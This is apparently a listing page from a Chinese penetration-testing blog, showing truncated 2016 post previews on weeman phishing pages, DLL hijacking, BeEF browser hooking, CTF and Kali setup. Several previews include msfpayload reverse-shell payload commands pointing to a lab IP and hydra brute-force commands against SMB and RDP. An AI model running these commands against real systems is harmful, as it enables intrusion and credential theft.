Eternal 8年前 (2016-08-26) 4245浏览 0评论

weeman是一个由Python编写的脚本。它可以创建一个钓鱼页面，来窃取用户的信息。下面我们来看看，如何使用该脚本。 首先，让我们从github上进行下载。 github clone https://github.com/Hypsurus/weem...

Eternal 8年前 (2016-08-25) 7743浏览 0评论

微软的“不安全dll加载”漏洞涉及Windows XP至Windows 7等多个版本的操作系统。由于Windows存在加载未指明完整路径的dll文件的机制，可能导致用户在使用第三方软件、玩游戏、听音乐时，会加载由木马 病毒伪装而成的dll文件，从而让...

Eternal 8年前 (2016-08-21) 6051浏览 0评论

首先，我们先生成一个 PAYLOAD ： msfpayload(msfvenom) windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1218 X >xx.exe 接着，我们来...

Eternal 8年前 (2016-08-20) 9404浏览 1评论

00×01 首先，我们先来生成一个 meterpreter 类型的 PALOAD ： msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X &...

Eternal 8年前 (2016-08-19) 8251浏览 0评论

破解smb服务密码： hydra -l administrator -P pass 192.168.2.3 smb 成功获取密码：123 破解rdp服务密码： hydra -l administrator -P pass 192.168.2.3 ...

Eternal 8年前 (2016-08-18) 5808浏览 0评论

上篇文章我们利用了 ms10-002 的这个 Exploit ，但目前来说它的利用率已经非常低了。因为它的 target 为IE6.0及以下的版本，只要用户按常规升级补丁，基本就很难利用到！今天，继续为大家介绍另一个IE的Exploit 。该EXP可...

Eternal 8年前 (2016-08-17) 11236浏览 2评论

00×01 首先，我们来到beef安装目录下，启动 ./beef 。这里就不做过多讲解了！成功启动后，我们可以在启动界面找到 UI 的登录地址及 hook.js 的文件地址。如下： Hook URL: http://192.168.80.1...

Eternal 8年前 (2016-08-08) 3131浏览 0评论

因为是在 vmvare 里进行安装，所以我们先将 ISO 文件，进行挂载！我们使用命令查看挂载情况： df -T 可以看到已经挂载上。 我们更改它的挂载点。 unmount /dev/sr0 mount /dev/sr0/media 查看是否挂...

Eternal 8年前 (2016-07-31) 26170浏览 1评论

0x00 前言 在安全的大趋势下，信息安全越来越来受到国家和企业的重视，所以CTF比赛场次越来越多，而且比赛形式也不断的创新，题目也更加新颖有趣，对选手的综合信息安全能力有一个较好的考验，当然更好的是能从比赛有所收获，不断学习和总结提升自己的信息安全...

Eternal 8年前 (2016-07-21) 14105浏览 1评论

今天教大家如何在手机上安装Kali渗透系统，让手机也成为你手中的hacker工具箱。 1.以我的手机为例。 型号:三星S3。 系统版本:YunOS 3.2.4 2.准备安装要用到的工具。 (1).Kali armhf架构镜像文件。 链接: http:...